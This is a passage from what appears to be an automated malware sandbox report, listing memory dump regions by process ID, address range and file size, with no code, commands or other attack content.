                                                                                                                                                                                                                                                                                                                                                                          • memory/4160-319-0x00000000047F0000-0x0000000004881000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            580KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/4160-320-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            40.0MB

                                                                                                                                                                                                                                                                                                                                                                          • memory/4172-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/4280-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/4372-309-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/4604-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/4644-181-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/4712-182-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/4720-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/4844-188-0x0000000002204000-0x0000000002205000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/4844-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/4844-161-0x0000000002200000-0x0000000002202000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/4904-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/4908-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/4952-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5000-178-0x0000000000FB0000-0x0000000000FB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5000-174-0x0000000004DB0000-0x0000000004DB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5000-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5000-167-0x0000000000460000-0x0000000000461000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5056-185-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5064-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5092-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5108-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5168-304-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5184-243-0x0000000003EC1000-0x0000000003FC2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            1.0MB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5184-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5184-245-0x0000000002750000-0x00000000027AC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            368KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5184-315-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5196-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5212-308-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5216-330-0x0000000000770000-0x0000000000782000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            72KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5216-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5216-328-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5224-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5300-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5316-335-0x0000000005290000-0x0000000005291000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5316-338-0x00000000051C0000-0x00000000057C6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5316-334-0x0000000005230000-0x0000000005231000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5316-336-0x00000000052D0000-0x00000000052D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5316-326-0x0000000000400000-0x000000000041C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            112KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5316-327-0x00000000004163C6-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5316-346-0x0000000005540000-0x0000000005541000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5316-332-0x00000000057D0000-0x00000000057D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5336-324-0x00000194BD000000-0x00000194BD101000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            1.0MB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5336-235-0x00007FF674E84060-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5336-274-0x00000194BAA70000-0x00000194BAAE0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            448KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5352-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5376-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5376-361-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5532-310-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5532-317-0x00000000004B0000-0x00000000004BC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            48KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5540-254-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5548-311-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5576-322-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5620-357-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5620-358-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5620-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5620-362-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5628-263-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5636-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5656-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5780-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5852-285-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5876-314-0x0000000000402F68-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5876-313-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            48KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5912-356-0x00000000047B0000-0x0000000004DB6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5912-349-0x00000000004163C6-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5940-350-0x0000000004CA0000-0x00000000052A6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5940-339-0x0000000000520000-0x0000000000521000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                                                          • memory/5940-337-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5976-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5976-344-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/5984-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/6028-291-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                          • memory/6072-333-0x0000000000000000-mapping.dmp